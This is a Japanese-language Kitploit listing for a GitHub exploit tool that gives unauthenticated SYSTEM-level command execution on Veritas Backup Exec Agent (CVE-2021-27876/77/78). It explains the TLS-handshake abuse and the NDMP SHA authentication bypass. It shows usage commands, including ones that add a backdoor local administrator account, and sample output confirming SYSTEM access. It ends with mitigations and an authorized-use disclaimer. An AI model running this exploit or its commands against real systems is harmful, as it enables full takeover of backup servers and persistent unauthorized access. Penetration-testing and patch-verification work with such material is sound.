Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-27876 — Veritas Backup Exec Agent向けの未認証RCEエクスプロイト(CVE-2021-27876/77/78)— NDMP経由でSHA認証をバイパスしてSYSTEM権限を取得 | Kitploit
ツール/GitHubGitHub/wingerbijay/cve-2021-27876
特権昇格脆弱性分析エクスプロイトペネトレーションテストコマンド&コントロール認証
GitHubwingerbijay/cve-2021-27876

CVE-2021-27876

Veritas Backup Exec Agent向けの未認証RCEエクスプロイト(CVE-2021-27876/77/78)— NDMP経由でSHA認証をバイパスしてSYSTEM権限を取得

リポジトリを見る
112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-27876

Veritas Backup Exec Agent(CVE-2021-27876/77/78)の認証不要RCEエクスプロイト — NDMPを介したSHA認証バイパスによるSYSTEM権限取得

CVE一覧

CVE説明CVSS 3.1
CVE-2021-27876NDMPプロトコルにおけるSHAハッシュ操作による認証バイパス9.8 Critical
CVE-2021-27877NDMPを介した認証不要の任意ファイル読み取り9.8 Critical
CVE-2021-27878NDMP_EXECUTE_COMMANDによる任意のOSコマンド実行9.8 Critical

勧告: Veritas VTS21-003

影響を受けるバージョン

  • Backup Exec 16.x
  • Backup Exec 20.x
  • Backup Exec 21.x ≤ 21.2 (agent revision ≤ 9.3)

修正バージョン: Backup Exec 21.3以降。


動作の仕組み

Veritas Backup Exec AgentはTCP/10000で待ち受け、NDMP(Network Data Management Protocol)で通信します。このエクスプロイトは次の3つの脆弱性を連鎖させます:

  1. TLSハンドシェイクの悪用 — エージェントは独自のTLSネゴシエーション中にCSRを要求します。エクスプロイトはローカルCAを生成し、エージェントのCSRに署名してハンドシェイクを完了させます。 これにより、事前共有シークレットなしでソケットがTLSにアップグレードされます。

  2. SHA認証バイパス(CVE-2021-27876) — NDMPのSHA認証はSHA256('\x00' * 64 + challenge)を計算します。パスワードが64バイトのゼロ埋めブロックとして前置され、サーバー側でパスワード素材の検証が行われないため、 どのクライアントでもパスワードを知らなくてもAdministratorとして認証できます。

  3. NDMP_EXECUTE_COMMAND(CVE-2021-27878) — 認証が完了すると、NDMP_EXECUTE_COMMANDメッセージタイプによりNT AUTHORITY\SYSTEMとして任意のOSコマンドが実行されます。出力は C:\Windows\Temp\_be_out.txtにリダイレクトされ、NDMP_FILE_READ経由で読み戻されます。


要件

Python 3.8+

最近のディストリビューションではPythonは「外部管理」(PEP 668)とマークされているため、仮想環境に依存関係をインストールしてください:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate
pip install cryptography

使用方法

python3 be_rce.py

使用例:

root@kitploit:~
# Confirm SYSTEM access
python3 be_rce.py 10.10.10.50 "whoami"

# Dump hostname and domain
python3 be_rce.py 10.10.10.50 "whoami /all"

# Add a local admin
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

Sample output:

[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────

対策

  • すべてのホストでVeritas Backup Exec Agentを21.3以降にアップグレードする
  • ホストファイアウォールとネットワークACLを使用して、TCP/10000を許可されたバックアップ管理ホストに制限する
  • 環境全体でBackup Exec Agentを実行しているすべてのホストを監査する

参照

  • https://www.veritas.com/support/en_US/security/VTS21-003
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

免責事項

このツールは、許可を受けたペネトレーションテストおよびセキュリティ研究専用です。明示的な書面による許可なしにシステムに対して使用することは違法です。作者は不正使用に対する一切の責任を負いません。

root@kitploit:~
ツールをダウンロード